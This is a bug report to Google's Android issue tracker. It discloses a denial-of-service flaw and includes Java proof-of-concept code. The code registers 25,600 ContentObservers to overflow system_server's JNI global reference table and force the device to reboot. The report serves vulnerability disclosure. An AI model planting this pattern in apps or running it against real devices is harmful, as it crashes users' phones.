Bug Report to Google of Android
https://issuetracker.google.com/issues/117744552
When the malicious code in an APP to register too many ContentObserver, it will make system_server creates many Binder Proxy objects and JNI Glocal Reference objects which will lead to JNI global reference table overflow that makes system reboots.
Just as the code bellow, when the method onClick called in Line 32, system will reboot of JNI Error.
The log and demo code are attached.
1 public class MainActivity extends ActionBarActivity
2 implements OnClickListener{
3
4 class SettingsObserver extends ContentObserver {
5 SettingsObserver(Handler handler) {
6 super(handler);
7 }
8
9 void observe() {
10 ContentResolver resolver = getContentResolver();
11 resolver.registerContentObserver(
12 Settings.System.getUriFor(Settings.System.ALARM_ALERT), false, this );
13
14 updateSettings();
15 }
16 @Override
17 public void onChange(boolean selfChange) {
18 updateSettings();
19 }
20
21 @Override
22 protected void finalize() throws Throwable {
23 getContentResolver().unregisterContentObserver(this);
24 // TODO Auto-generated method stub
25 super.finalize();
26 }
27 }
28
29 public void updateSettings() {
30 }
31
32 public void onClick(View src)
33 {
34 try {
35 new Thread() {
36 @Override
37 public void run(){
38 for (int i = 0; i < 25600; i++) {
39 SettingsObserver observer = new SettingsObserver(null);
40 observer.observe();
41 }
42 }
43 }.start();
44
45 } catch (Exception e) {
46 // TODO: handle exception
47 }
48
49
50 }
51